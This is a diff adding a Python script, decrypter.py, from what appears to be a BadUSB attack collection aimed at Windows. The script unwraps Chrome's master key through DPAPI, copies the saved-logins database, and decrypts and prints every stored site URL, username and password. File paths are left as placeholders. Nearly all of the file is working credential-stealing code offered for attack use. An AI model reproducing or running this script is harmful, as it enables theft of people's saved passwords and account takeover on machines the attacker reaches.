■ ■ ■ ■ ■ ■
BadUsb-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/decrypter.py
| 1 | + | import os |
| 2 | + | import json |
| 3 | + | import base64 |
| 4 | + | import sqlite3 |
| 5 | + | import win32crypt |
| 6 | + | from Crypto.Cipher import AES |
| 7 | + | import shutil |
| 8 | + | from datetime import timezone, datetime, timedelta |
| 9 | + | |
| 10 | + | def get_chrome_datetime(chromedate): |
| 11 | + | return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) |
| 12 | + | |
| 13 | + | def get_encryption_key(): |
| 14 | + | local_state_path = "path to key" |
| 15 | + | with open(local_state_path, "r", encoding="utf-8") as f: |
| 16 | + | local_state = f.read() |
| 17 | + | local_state = json.loads(local_state) |
| 18 | + | |
| 19 | + | key_b64 = local_state["os_crypt"]["encrypted_key"] |
| 20 | + | key = base64.b64decode(key_b64)[5:] # remove 'DPAPI' prefix |
| 21 | + | return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] |
| 22 | + | |
| 23 | + | def decrypt_password(password, key): |
| 24 | + | try: |
| 25 | + | # extract initialization vector (IV) and encrypted password |
| 26 | + | iv = password[3:15] |
| 27 | + | encrypted_password = password[15:] |
| 28 | + | |
| 29 | + | # create a cipher object using the key and IV |
| 30 | + | cipher = AES.new(key, AES.MODE_GCM, iv) |
| 31 | + | |
| 32 | + | # decrypt the password |
| 33 | + | return cipher.decrypt(encrypted_password)[:-16].decode() |
| 34 | + | except Exception: |
| 35 | + | # fallback to Windows Data Protection API (DPAPI) |
| 36 | + | try: |
| 37 | + | return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) |
| 38 | + | except Exception: |
| 39 | + | return "" |
| 40 | + | |
| 41 | + | def main(): |
| 42 | + | # get the encryption key |
| 43 | + | key = get_encryption_key() |
| 44 | + | |
| 45 | + | # get the path to the Chrome login database |
| 46 | + | db_path = "path to encrypted file" |
| 47 | + | |
| 48 | + | # create a copy of the login database |
| 49 | + | filename = "ChromeData.db" |
| 50 | + | shutil.copyfile(db_path, filename) |
| 51 | + | |
| 52 | + | # connect to the copy of the database |
| 53 | + | db = sqlite3.connect(filename) |
| 54 | + | cursor = db.cursor() |
| 55 | + | |
| 56 | + | # get the login data |
| 57 | + | cursor.execute("SELECT origin_url, action_url, username_value, password_value, date_created, date_last_used FROM logins ORDER BY date_created") |
| 58 | + | for row in cursor.fetchall(): |
| 59 | + | origin_url = row[0] |
| 60 | + | action_url = row[1] |
| 61 | + | username = row[2] |
| 62 | + | password = decrypt_password(row[3], key) |
| 63 | + | date_created = row[4] |
| 64 | + | date_last_used = row[5] |
| 65 | + | |
| 66 | + | if username or password: |
| 67 | + | print(f"Origin URL: {origin_url}") |
| 68 | + | print(f"Action URL: {action_url}") |
| 69 | + | print(f"Username: {username}") |
| 70 | + | print(f"Password: {password}") |
| 71 | + | else: |
| 72 | + | continue |
| 73 | + | if date_created != 86400000000 and date_created: |
| 74 | + | print(f"Creation date: {str(get_chrome_datetime(date_created))}") |
| 75 | + | if date_last_used != 86400000000 and date_last_used: |
| 76 | + | print(f"Last Used: {str(get_chrome_datetime(date_last_used))}") |
| 77 | + | print("="*50) |
| 78 | + | cursor.close() |
| 79 | + | db.close() |
| 80 | + | try: |
| 81 | + | os.remove(filename) |
| 82 | + | except Exception: |
| 83 | + | pass |
| 84 | + | |
| 85 | + | if __name__ == "__main__": |
| 86 | + | main() |